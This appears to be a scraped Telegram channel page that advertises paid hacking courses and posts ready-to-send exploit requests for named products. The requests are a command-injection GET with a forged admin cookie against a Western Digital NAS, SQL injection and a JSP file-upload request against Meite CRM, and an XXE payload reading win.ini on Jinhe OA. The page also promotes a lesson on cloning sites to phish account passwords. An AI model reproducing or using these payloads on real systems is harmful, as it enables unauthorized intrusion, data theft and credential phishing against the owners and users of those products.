web安全/黑客教程|技术学习/逆向工程 web渗透|黑客|远控免杀|kaliLinux渗透
3.02K subscribers
144 photos
18 videos
4 files
49 links
web安全/黑客教程|技术学习/逆向工程
web渗透|黑客|远控免杀|kaliLinux渗透
Download Telegram
为什么会从2980降价到1980
没错,我们就是为了赚钱,但我们也渴望更多的人在疾风速客拿到结果[得意]你相信我,【疾风速客】会成为你收获成功的绝佳助力,不相信我,我们彼此也都没有什么损失。
TG必备的搜索引擎,极搜帮你精准找到,想要的群组、频道、音乐 、视频

👇👇👇点击下方按钮,进行搜索
TG必备的搜索引擎,极搜帮你精准找到,想要的群组、频道、音乐 、视频

👇👇👇点击下方按钮,进行搜索
西部数据 NAS chk_vv_sharename.php 远程命令执行漏洞
GET /web/php/chk_vv_sharename.php?vv_sharename=";id;" HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15
Connection: keep-alive
Cookie: isAdmin=1; username=admin;
Accept-Encoding: gzip, deflate, br
美特CRM mcc_login.jsp SQL注入漏洞
POST /si/callcenter/solarun/mcc_login.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 42
Content-Type: application/x-www-form-urlencoded ; application/x-www-form-urlencoded
Expires: 0
Pragma: no-cache
Accept-Encoding: gzip

workerid=1'&passwd=abc123def&rtype=call400
web渗透|黑客教程|逆向工程|kaliLinux渗透:
学技术认准

QQ:2631189421
tg认准👉@webabc👈
编号: CVE-2025-5419
访问地址: https://github.com/itsShotgun/chrome_cve-2025-5419...
描述: Checks if your Chrome version is vulnerable to CVE-2025-5419, from the browser
[注意:新的CVE仓库,请自行分辨是否为红队钓鱼]
今天晚上将会讲解钓鱼伪装网站盗取任意账号密码
web渗透|黑客教程|逆向工程|kaliLinux渗透:
学技术认准

QQ:2631189421
tg认准👉@webabc👈
课程主题:《公开课:社会工程之使用钓鱼盗取任意账号密码》
课程内容:
介绍了钓鱼攻击,这是一种通过社会工程手段欺骗人们泄露个人信息和凭证的攻击方法。攻击者会创建看似合法的网站或通信,诱骗用户输入敏感信息。钓鱼攻击针对的是人的心理弱点,而非技术漏洞,因此即使是最安全的系统也可能被攻破。

为了演示钓鱼攻击的过程,1使用Kali Linux操作系统和SE工具包创建了一个克隆网站。
2并通过URL屏蔽技术使其看起来更合法。
3攻击者还会使用紧迫感或兴奋感的术语来操纵情绪,以增加欺骗性。
如何防范:
为了保护自己和信息安全,1建议用户在输入凭证前验证URL,2使用双因素身份验证,保持系统和浏览器更新,并安装反钓鱼保护软件。此外,要警惕未经请求的通信,询问个人信息,并学会识别钓鱼的迹象。
声明:
最后,强调知识和责任的重要性,提醒观众用所学知识保护自己,永远不要造成伤害。
web渗透|黑客教程|逆向工程|kaliLinux渗透:
学技术认准

QQ:2631189421
tg认准👉@webabc👈
金和OA  /servlet/ActionDataSet存在XXE漏洞

POST /jc6/servlet/ActionDataSet HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D4849851A1A6578CDE4C441FA16BE524
Connection: close
Content-Length: 125

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <root>&xxe;</root>
美特CRM upload.jsp 文件上传


POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host:
Content-Length: 768
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://0.0.0.0/develop/systparam/softlogo/file2.js...
Connection: close

------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="file"; filename="klms.jsp"
Content-Type: text/plain

<% out.print("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary0Mh3BfgWszxRFokh--

上传路径
GET /userfile/default/userlogo/{{filename}}.jsp HTTP/1.1